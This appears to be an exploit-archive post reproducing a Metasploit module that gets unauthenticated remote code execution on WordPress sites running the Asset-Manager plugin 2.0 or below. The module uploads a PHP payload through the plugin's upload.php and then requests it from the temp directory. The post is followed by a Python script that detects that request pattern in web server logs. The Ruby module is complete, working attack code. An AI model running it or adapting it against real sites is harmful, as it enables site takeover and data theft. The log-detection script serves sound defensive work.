WordPress Asset-Manager PHP File Upload Vulnerability
Posted on 2012-12-31 09:22:33

This module, taken from the Metasploit exploit library, exploits a vulnerability found in the WordPress Asset-Manager plugin version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which leads to arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    # Step 1: unauthenticated upload through the plugin's upload.php
    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Step 2: request the uploaded file from the temp directory so the server executes it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
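From the defender's side, the two requests the module makes leave a recognisable pair of entries in the web server access log: a POST to the plugin's upload.php followed by a GET of a .php file under wp-content/uploads/assets/temp. The Python script below is an added example, not part of the original post or of Metasploit; it correlates those two entries per client over constructed Apache combined-format log lines (the IPs, timestamps and file names are made up).

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format (constructed samples below, not real traffic)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Paths used by the vulnerable plugin: the upload handler and the temp directory it writes to
UPLOAD_PATH = "/wp-content/plugins/asset-manager/upload.php"
TEMP_RE = re.compile(r"/wp-content/uploads/assets/temp/([^/?]+\.php)", re.IGNORECASE)

SAMPLE_LOG = """\
203.0.113.7 - - [31/Dec/2012:09:20:01 +0800] "GET /wordpress/ HTTP/1.1" 200 4311
203.0.113.7 - - [31/Dec/2012:09:20:05 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 98
203.0.113.7 - - [31/Dec/2012:09:20:06 +0800] "GET /wordpress/wp-content/uploads/assets/temp/kqzfa.php HTTP/1.1" 200 0
198.51.100.9 - - [31/Dec/2012:09:21:10 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 98
198.51.100.9 - - [31/Dec/2012:09:21:12 +0800] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 8123
192.0.2.4 - - [31/Dec/2012:09:22:00 +0800] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 404 210
"""

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_upload_then_exec(log_text):
    """Return {ip: [php_filename, ...]} for clients that POSTed successfully to the
    plugin's upload.php and later fetched a .php file from uploads/assets/temp.
    A .php fetch from that directory with no prior upload by the same client is
    still suspicious (status 404 included) and is reported under 'unmatched'."""
    uploaded = set()
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        if rec["method"] == "POST" and rec["path"].endswith(UPLOAD_PATH) and rec["status"] == "200":
            uploaded.add(rec["ip"])
            continue
        m = TEMP_RE.search(rec["path"])
        if m and rec["method"] == "GET":
            key = rec["ip"] if rec["ip"] in uploaded else "unmatched"
            hits[key].append(m.group(1))
    return dict(hits)
```

Only a .php name in the temp directory is treated as a second stage; ordinary asset fetches (the logo.png line) are ignored, while a .php fetch with no matching upload is still surfaced so a failed or partial attempt is not lost.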